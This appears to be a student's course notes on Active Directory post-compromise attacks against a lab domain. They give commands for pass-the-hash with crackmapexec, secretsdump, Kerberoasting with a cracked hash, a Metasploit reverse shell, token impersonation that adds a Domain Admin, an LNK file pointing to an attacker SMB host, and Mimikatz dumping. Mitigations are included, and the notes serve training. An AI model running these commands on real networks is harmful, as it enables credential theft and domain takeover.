Skip to content

Latest commit

 

History

History
255 lines (169 loc) · 13.5 KB

19. Attacking Active Directory - Post-Compromise Attacks.md

File metadata and controls

255 lines (169 loc) · 13.5 KB

Attacking Active Directory - Post-Compromise Attacks

Introduction

  • we need some credentials for these attacks to be effective.

Pass Attacks Overview

  • apt install crackmapexec
  • crackmapexec smb --help to see what we need to provide

Pass Attacks

  • crackmapexec smb 192.168.92.0/24 -u fcastle -d MARVEL.local -p 'Password1'
  • crackmapexec smb 192.168.92.0/24 -u fcastle -d MARVEL.local -p 'Password1' --sam to dump the sam hashes
  • crackmapexec smb 192.168.92.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --local-auth --sam or crackmapexec smb 192.168.92.0/24 -u "David Lieberman" -H aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0 --local-auth --sam
  • crackmapexec smb 192.168.92.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --local-auth --shares to see shared folders
  • crackmapexec smb 192.168.92.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --local-auth --lsa to see LSA secrets

Using modules

  • crackmapexec smb 192.168.92.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -M lsassy
  • everything is stored in CME database: cmedb, then hosts and creds in the shell

Dumping and Cracking Hashes

  • secretsdump.py MARVEL.local/administrator:'P@$$w0rd!'@192.168.92.146: there can be clear text passwords and logins in here

  • Need the NT portion, not the LM

  • Full hash: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

  • LM Portion: aad3b435b51404eeaad3b435b51404ee

  • NT Portion: 31d6cfe0d16ae931b73c59d7e0c089c0

  • hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt

  • once you have fcastle hash, you crack it, you spray the password. Once you found a new login, you secretdump thos logins. Now, you can use local admin hashes to respray the network with local accounts (reducing the risk to block an account).

Pass Attack Mitigations

Limit Account re-use

  • Avoid re-using local admin password (error with fcastle)
  • Disable guest and Admin accounts
  • Limit who is a local admin (least privilege)

Utilize Strong Passwords

  • The longer, the better (>14 characters)
  • Avoid using common words
  • Long sentences

Privilege Access Management (PAM)

  • Check out/in sensitive accounts when needed
  • Automatically rotate passwords on check out/in
  • Limits pass attacks as hash/passwords is strong and constantly rotated

Kerberoasting Overview

User Authentication

When a user logs in, they receive a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC), which is part of the domain controller.

Service Access

When the user needs to access a service (like an application server), they use their TGT to request a Service Ticket (ST) for that service from the KDC.

Service Ticket

The KDC issues the ST, encrypted with the service account's password hash, allowing the user to access the service. We'll crack that password hash.

https://medium.com/@Shorty420/kerberoasting-9108477279cc

Kerberoasting Walkthrough

  • GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.92.146 -request
$krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111*$41957e1e1485995e2ad4f86a469b5c14$95be299094e512463d8435aa4ca7c42ce5cfceaea77eccbe42a56d7d5de3321d1c6ef530f563b67947b02f9fb5585750b0f68c6180be109b54a4dff326bb82bbd7a278f9525b8a294e726022e3d70a64c178e5742ef17afadf984046967514af91cdb8f26ea6b943e218c6dff9bb34435ed77a012d90b71feecb31da6f9b92ecdd382fe33726cc9be368b997e2346d485143e2ce75a5d470f280fe600baa2ab7049235e90481b4fc0032523ac9802bab9b78514efe229d25b6080e9ae0fb1784e7d4883f6fe036885f410a293af61e373d7968d9bcdd0eb79dbbc869e3ed7c34259ee35b650de08f8cfc3c1a835cc6faa5e8ad835643c9e021c8d2925338c7ee87d9542778e102d4211a97b132176d3217f39465d75aaa8d88875139668014c74edd536a4a659bda94d38e0e5a5fdbab6faf190c38d9c7bdb835dbced27e0ac768186a613ce92d559815d33ff9d3f38b9d7a8554de38ac11429083d4088206cc391e6ef5bf9d2e08eba9177d179a52403978245bbeb8d4969cb61f41f579a581f6d16243918fef0197075173d4051b7db6e2423ac3795707ae382ec8049adcb0c43c31ba6e1a1a28a98c2112e863f8d14239d2fcc45ba7e24b54cdf018509a390f653551410518fd5b8a35b0875c44a6b6a88aed112847d60a3c905e829f0488c9f6fb6d338125ea562181c98ac5a60e041a930634dcdcce5b1428830c49b5197c5089265139653ee2d0927894daec8c39ea58a83f644e8ff8a26216bbc6d03ace30f12d5288d8aca1ba22b7ec5504a3b13dc99ec9db5b034edd4b9a16ba77fbd69422ded14150774226d76099dc1f4647ed227db0e9ccf6517a9dacf91d879bfcbda687242d5761910763c691d76d09c303a64bc25afeaf08fe4c650df7028a68fe85d156ceab38acd02c421eceb46052338802d091bfebe4ed45cc389cd656749be2843420b60be97944f5e9c4f4862b6cbf50f97761c5ae437d347d68689bc6a00307932356736b51880c291486a3da7ad24f8528b2971f697cd3f6ea15c5fef37d39a4ed693de853a3f7e7a0a3beb9aa66e4c8fb2826411e4cd91f11898652bb38c1383714c40245cdacc90a39d2cfdb8ea237e41ea64b14bb9c65db0f15f5c7c045a3f7b2c24534e709bfe53d89104de9f7ad7f9f4ed603436c0079154c47bc39df229faf725675d5d0b67b559c3dc4ad757ced8987a922ff504fc8ffe536e6626925d5f0905eba997eea761deecac9d4e95c10db41737b30d7e803840926b426703651a58f54f0fe1a2234b20bec232b62c32c595c2528a228dfc10b335dd78e5a87f2a02d8376f93a83aa2b611cece18e60ac062936797d1fd7fb0bb1e7c81dbbddcd09af3f405281914fd396e0571150b144a21db4b4a5fb3d26d44e6483d1f471a3d40f8c046e350e0d740d07b3c30be3ff251298e21ac7b2deded52e8aa50de7115269dc1683c3a238f3d00b11691f5db5f65a891a9531
  • save the hash to a file: nano hash.txt
  • look for the right algo: hashcat --help | grep Kerberos (we need Ticket Granting Service, TGS)
  • crack the hash with hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111*$41957e1e1485995e2ad4f86a469b5c14$95be299094e512463d8435aa4ca7c42ce5cfceaea77eccbe42a56d7d5de3321d1c6ef530f563b67947b02f9fb5585750b0f68c6180be109b54a4dff326bb82bbd7a278f9525b8a294e726022e3d70a64c178e5742ef17afadf984046967514af91cdb8f26ea6b943e218c6dff9bb34435ed77a012d90b71feecb31da6f9b92ecdd382fe33726cc9be368b997e2346d485143e2ce75a5d470f280fe600baa2ab7049235e90481b4fc0032523ac9802bab9b78514efe229d25b6080e9ae0fb1784e7d4883f6fe036885f410a293af61e373d7968d9bcdd0eb79dbbc869e3ed7c34259ee35b650de08f8cfc3c1a835cc6faa5e8ad835643c9e021c8d2925338c7ee87d9542778e102d4211a97b132176d3217f39465d75aaa8d88875139668014c74edd536a4a659bda94d38e0e5a5fdbab6faf190c38d9c7bdb835dbced27e0ac768186a613ce92d559815d33ff9d3f38b9d7a8554de38ac11429083d4088206cc391e6ef5bf9d2e08eba9177d179a52403978245bbeb8d4969cb61f41f579a581f6d16243918fef0197075173d4051b7db6e2423ac3795707ae382ec8049adcb0c43c31ba6e1a1a28a98c2112e863f8d14239d2fcc45ba7e24b54cdf018509a390f653551410518fd5b8a35b0875c44a6b6a88aed112847d60a3c905e829f0488c9f6fb6d338125ea562181c98ac5a60e041a930634dcdcce5b1428830c49b5197c5089265139653ee2d0927894daec8c39ea58a83f644e8ff8a26216bbc6d03ace30f12d5288d8aca1ba22b7ec5504a3b13dc99ec9db5b034edd4b9a16ba77fbd69422ded14150774226d76099dc1f4647ed227db0e9ccf6517a9dacf91d879bfcbda687242d5761910763c691d76d09c303a64bc25afeaf08fe4c650df7028a68fe85d156ceab38acd02c421eceb46052338802d091bfebe4ed45cc389cd656749be2843420b60be97944f5e9c4f4862b6cbf50f97761c5ae437d347d68689bc6a00307932356736b51880c291486a3da7ad24f8528b2971f697cd3f6ea15c5fef37d39a4ed693de853a3f7e7a0a3beb9aa66e4c8fb2826411e4cd91f11898652bb38c1383714c40245cdacc90a39d2cfdb8ea237e41ea64b14bb9c65db0f15f5c7c045a3f7b2c24534e709bfe53d89104de9f7ad7f9f4ed603436c0079154c47bc39df229faf725675d5d0b67b559c3dc4ad757ced8987a922ff504fc8ffe536e6626925d5f0905eba997eea761deecac9d4e95c10db41737b30d7e803840926b426703651a58f54f0fe1a2234b20bec232b62c32c595c2528a228dfc10b335dd78e5a87f2a02d8376f93a83aa2b611cece18e60ac062936797d1fd7fb0bb1e7c81dbbddcd09af3f405281914fd396e0571150b144a21db4b4a5fb3d26d44e6483d1f471a3d40f8c046e350e0d740d07b3c30be3ff251298e21ac7b2deded52e8aa50de7115269dc1683c3a238f3d00b11691f5db5f65a891a9531:Password1
  • we found the SQL service password.

Kerberoasting Mitigation

  • Strong Passwords: 14 characters with common words can be easily cracked.
  • Least Privilege: don't put service accounts as admin accounts.

Token Impersonation Overview

Token impersonation involves using temporary keys, known as tokens, which allow access to a system or network without needing to provide credentials repeatedly. These tokens function like cookies for computers.

Types of Tokens

Delegate Tokens

Created when logging into a machine using tools like Remote Desktop Protocol (RDP). Allow access to network resources as if the user is present at the machine.

Impersonate Tokens

Used for "non-interactive" actions, such as attaching a network drive or executing a domain logon script. Enable a process to assume the identity of a user without requiring direct login.

Token Impersonation Walkthrough

Using metasploit

  • run msfconsole, then use exploit/windows/smb/psexec
  • set payload windows/x64/meterpreter/reverse_tcp
  • we want to attack fcastle: set rhosts 192.168.92.142
  • set smbdomain MARVEL.local
  • set smbuser fcastle
  • set smbpass Password1
  • exploit
  • hashdump

Loading modules

  • load incognito
  • we will list the tokens for the users: list_tokens -u
  • list_tokens -g
  • impersonate_token MARVEL\\fcastle
  • shell, whoami gives now marvel\fcastle
  • exit the shell, rev2self to stop impersonating fcastle

Adding a user

  • impersonate_token MARVEL\\Administrator
  • shell, whoami gives now marvel\administrator
  • net user /add plague Password1 /domain
  • net group "Domain Admins" plague /add /domain

Token Impersonation Mitigation

Limit user/group token creation permissions

Limiting token creation permissions alone is not highly effective for mitigation.

Account Tiering

  • Domain Admin Practices: Domain Admins should only log into critical systems like Domain Controllers to prevent their tokens from being exposed on end-user machines.
  • Separate Accounts: Domain Admins should use two separate accounts—one for daily tasks and another with elevated privileges for accessing Domain Controllers.

Local Admin Restriction

Limit local admin rights to essential users only. If every user has local admin access and gets compromised, attackers can gain shell access and perform token impersonation attacks.

LNK File Attacks

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\IP_ADDRESS_ATTACKER\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
  • Make sure SMB is turned ON in responder.conf
  • Start responder responder -I eth0 -w -d -v
  • Navigate to the share and you should receive captured hashed in responder

GPP / cPassword Attacks and Mitigations

Attack

  • Group Policy Preferences (GPP): Allowed admins to create policies with embedded credentials.
  • cPassword: Credentials were encrypted and stored as "cPassword."
  • Key Leak: The encryption key was accidentally released, making these credentials vulnerable.
  • Relevance: Although MS14-025 patches this, previous credentials remain exposed.
  • Exploitation: Tools like smb_enum_gpp in Metasploit can exploit this vulnerability.

Mitigation

  • Patch: Apply the fix from KB2962486 to secure systems.
  • Clean Up: Delete old GPP XML files in SYSVOL to remove exposed credentials.

Mimikatz Overview

Mimikatz is a powerful tool used by security professionals to interact with Windows authentication mechanisms. It is primarily used for:

  • Viewing and stealing credentials.
  • Generating Kerberos tickets.
  • Executing various attacks such as credential dumping, pass-the-hash, over-pass-the-hash, pass-the-ticket, golden ticket, and silver ticket attacks.

Setup

  1. Download Mimikatz:

    • Visit the GentilKiwi Mimikatz GitHub releases page.
    • To avoid security issues, download the trunk.zip directly on the domain controller machine using curl: 
      curl -L -o mimikatz_trunk.zip "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip"

  2. Extract Mimikatz:

    • Use the tar command to extract the ZIP file: 
      tar -xf C:\Users\Administrator\mimikatz_trunk.zip -C C:\Users\Administrator\mimikatz

  3. Navigate to the Directory:

    • Change to the mimikatz/x64 directory where you should have four files: 
      cd C:\Users\Administrator\mimikatz\x64

Credential Dumping with Mimikatz

To dump credentials stored in memory, follow these steps:

  1. Run Mimikatz:

    • Execute mimikatz.exe from the command prompt.

  2. Enable Debug Privileges:

    • Enter the command: 
      privilege::debug

  3. Dump Credentials:

    • Use the command to view logon passwords: 
      sekurlsa::logonpasswords
    • You can find NTLM hashes, computer passwords, clear text passwords, etc.

Post-Compromise Attack Strategy

Search for Quick Wins

  • Kerberoasting: Extracting service account credentials from Kerberos ticketing.
  • Secretsdump.py: Using this tool to extract sensitive information remotely.
  • Pass the Hash/Password: Leveraging captured hashes for lateral movement.

Enumerate

  • Bloodhound: Analyze Active Directory relationships and identify paths to escalate privileges.
  • Account Access: Determine where compromised accounts have access.
  • Old Vulnerabilities: Search for and exploit unpatched vulnerabilities in the system.